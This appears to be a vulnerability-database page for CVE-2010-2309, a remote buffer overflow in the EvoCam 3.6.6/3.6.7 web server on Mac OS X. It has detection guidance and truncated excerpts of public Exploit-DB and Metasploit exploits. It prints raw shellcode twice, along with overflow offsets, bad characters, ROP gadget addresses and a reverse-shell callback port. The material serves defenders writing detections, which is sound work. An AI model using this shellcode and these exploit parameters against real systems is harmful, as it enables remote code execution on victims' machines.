CVE-2010-2309
published 2010-06-16CVE-2010-2309: Buffer overflow in the web server for EvoLogical EvoCam 3.6.6 and 3.6.7 allows remote attackers to execute arbitrary code via a long GET request.
PriorityP261high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
50.84%
98.8th percentile
Buffer overflow in the web server for EvoLogical EvoCam 3.6.6 and 3.6.7 allows remote attackers to execute arbitrary code via a long GET request.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| evological | evocam | — | — |
| evological | evocam | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xdb\xd2\x29\xc9\xb1\x27\xbf\xb1\xd5\xb6\xd3\xd9\x74\x24\xf4\x5a\x83\xea\xfc\x31\x7a\x14\x03\x7a\xa5\x37\x43\xe2\x05\x2e\xfc\x45\xd5\x11\xad\x17\x65\xf0\x80\x18\x8a\x71\x64\x19\x94\x75\x10\xdf\xc6\x27\x70\x88\xe6\xc5\x65\x14\x6f\x2a\xef\xb4\x3c\xfb\xa2\x04\xaa\xce\xc3\x17\x4d\x83\x95\x85\x21\x49\xd7\xaa\x33\xd0\xb5\xf8\xe5\xbe\x89\xe3\xc4\xbf\x98\x4f\x5f\x78\x6d\xab\xdc\x6c\x8f\x08\xb1\x25\xc3\x3e\x6f\x07\x63\x4c\xcc\x14\x9f\xb2\xa7\xeb\x51\x75\x17\x5c\xc2\x25\x27\x67\x2f\x45\xd7\x08\x93\x6b\xa2\x21\x5c\x31\x81\xb2\x1f\x4c\x19\xc7\x08\x80\xd9\x77\x5f\xcd\xf6\x04\xf7\x79\x27\x89\x6e\x14\xbe\xae\x21\xb8\x93\x60\x72\x03\xde\x01\x43\xb4\xb0\x88\x47\x64\x60\xd8\xd7\xd5\x30\xd9\x1a\x55\x01\x26\xf4\x06\x21\x6b\x75\xac
- →Exploit triggers via an oversized HTTP GET request; for EvoCam 3.6.6 the overflow offset is 1560 bytes, for 3.6.7 it is 1308 bytes. Detect anomalously long GET request URIs to port 8080 targeting EvoCam. ↗
- →The exploit sends a raw HTTP/1.0 GET request with no Host header and a payload-filled URI; pattern-match on 'GET ' followed by >1300 bytes of non-path data before ' HTTP/1.0'. ↗
- →ROP chain uses dyld addresses (0x8fe*) as gadgets; memory forensics or crash dumps showing EIP/RET targets in the 0x8fe00000–0x8fe70000 range on OS X 10.5.8 are indicative of exploitation. ↗
- →Metasploit module bad characters for payload encoding are \x00\xff\x09\x0a\x0b\x0c\x0d\x20; IDS signatures should flag GET request bodies containing long runs of bytes that avoid these values. ↗
- →The exec-from-heap stub begins with a fixed 4-byte fragment \x90\x58\x61\xc3 (nop/pop eax/popa/ret) immediately followed by the setjmp address 0x8fe1cf38; this byte sequence in a GET URI body is a strong exploit indicator. ↗
- →Reverse shell callback expected on victim port 4444 after successful exploitation; monitor for unexpected outbound or inbound connections on TCP/4444 from the EvoCam host process. ↗
- ·EvoCam 3.6.8 patches the vulnerability; detections and mitigations are only relevant for versions 3.6.6 and 3.6.7 (and possibly earlier). ↗
- ·CVE-2010-2309 is also referenced by a separate UFO: Alien Invasion IRC client exploit (EDB-16864); ensure detections are scoped to the EvoCam HTTP vector (port 8080 GET overflow) and not confused with the IRC vector (port 6667). ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Apple Mac OSX EvoCam Web Server - GET Buffer Overflow (Metasploit)
exploitdb·2010-10-09
CVE-2010-2309 Apple Mac OSX EvoCam Web Server - GET Buffer Overflow (Metasploit)
Apple Mac OSX EvoCam Web Server - GET Buffer Overflow (Metasploit)
---
##
# $Id: evocam_webserver.rb 10617 2010-10-09 06:55:52Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'MacOS X EvoCam HTTP GET Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the web server provided with the EvoCam
program for Mac OS X. We use Dino Dai Zovi's exec-from-heap technique to copy the payload
from the non-executable stack segment to heap memory. Vulnerable versions include 3.6.6,
3.6.7, and possibly earlier vers
Exploit-DB
UFO: Alien Invasion IRC Client (OSX) - Remote Buffer Overflow (Metasploit)
exploitdb·2010-10-09
CVE-2010-2309 UFO: Alien Invasion IRC Client (OSX) - Remote Buffer Overflow (Metasploit)
UFO: Alien Invasion IRC Client (OSX) - Remote Buffer Overflow (Metasploit)
---
##
# $Id: ufo_ai.rb 10617 2010-10-09 06:55:52Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'UFO: Alien Invasion IRC Client Buffer Overflow Exploit',
'Description' => %q{
This module exploits a buffer overflow in the IRC client component
of UFO: Alien Invasion 2.2.1.
},
'Author' =>
[
'Jason Geffner', # Original Windows PoC Author
'dookie' # OSX Exploit Author
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10617 $',
'References' =>
[
[ 'CVE', '201
Exploit-DB
Apple Mac OSX EvoCam Web Server (Snow Leopard) - ROP Remote Overflow
exploitdb·2010-07-06
CVE-2010-2309 Apple Mac OSX EvoCam Web Server (Snow Leopard) - ROP Remote Overflow
Apple Mac OSX EvoCam Web Server (Snow Leopard) - ROP Remote Overflow
---
#!/usr/bin/python
# EvoCam Web Server OSX 3.6.6 and 3.6.7
import socket
import struct
SHELL = ( "\xdb\xd2\x29\xc9\xb1\x27\xbf\xb1\xd5\xb6\xd3\xd9\x74\x24"
"\xf4\x5a\x83\xea\xfc\x31\x7a\x14\x03\x7a\xa5\x37\x43\xe2"
"\x05\x2e\xfc\x45\xd5\x11\xad\x17\x65\xf0\x80\x18\x8a\x71"
"\x64\x19\x94\x75\x10\xdf\xc6\x27\x70\x88\xe6\xc5\x65\x14"
"\x6f\x2a\xef\xb4\x3c\xfb\xa2\x04\xaa\xce\xc3\x17\x4d\x83"
"\x95\x85\x21\x49\xd7\xaa\x33\xd0\xb5\xf8\xe5\xbe\x89\xe3"
"\xc4\xbf\x98\x4f\x5f\x78\x6d\xab\xdc\x6c\x8f\x08\xb1\x25"
"\xc3\x3e\x6f\x07\x63\x4c\xcc\x14\x9f\xb2\xa7\xeb\x51\x75"
"\x17\x5c\xc2\x25\x27\x67\x2f\x45\xd7\x08\x93\x6b\xa2\x21"
"\x5c\x31\x81\xb2\x1f\x4c\x19\xc7\x08\x80\xd9\x77\x5f\xcd"
"\xf6\x04\xf7\x79\x27\x89\x6e\x14\xbe
Exploit-DB
Apple Mac OSX EvoCam Web Server 3.6.6/3.6.7 - Remote Buffer Overflow
exploitdb·2010-06-05
CVE-2010-2309 Apple Mac OSX EvoCam Web Server 3.6.6/3.6.7 - Remote Buffer Overflow
Apple Mac OSX EvoCam Web Server 3.6.6/3.6.7 - Remote Buffer Overflow
---
#!/usr/bin/python
# Exploit Title: OS X EvoCam Web Server Buffer Overflow Exploit 3.6.6 and 3.6.7
# Date: 1st June 2010
# Author: d1dn0t ( didnot __A-T__ me.com )
# Software Link: http://www.pizza.org/evocam.dmg
# Version: EvoCam 3.6.6 and 3.6.7
# Tested on: OS X 10.5.8 Intel
import socket
import sys
import struct
from optparse import OptionParser
# OS X EvoCam Web Server Buffer Overflow Exploit 3.6.6 and 3.6.7
# Tested on Leopard 10.5.8 Intel
# Paul Harrington didnot __A-T__ me.com
#
#$ ./evocam.py -H 192.168.1.28 -P 8080 -T 2
#EvoLogical EvoCam 3.6.6/7 on OS X 10.5.8 Intel HTTP Buffer Overflow Exploit
#didnot __A-T__ me.com
#Targeting EvoCam Version 3.6.7
#[+] Sending evil buffer...
#[+] Done!
#[*] Check your s
Metasploit
MacOS X EvoCam HTTP GET Buffer Overflow
metasploit
MacOS X EvoCam HTTP GET Buffer Overflow
MacOS X EvoCam HTTP GET Buffer Overflow
This module exploits a stack buffer overflow in the web server provided with the EvoCam program for Mac OS X. We use Dino Dai Zovi's exec-from-heap technique to copy the payload from the non-executable stack segment to heap memory. Vulnerable versions include 3.6.6, 3.6.7, and possibly earlier versions as well. EvoCam version 3.6.8 fixes the vulnerability.
No writeups or analysis indexed.
2010-06-16
Published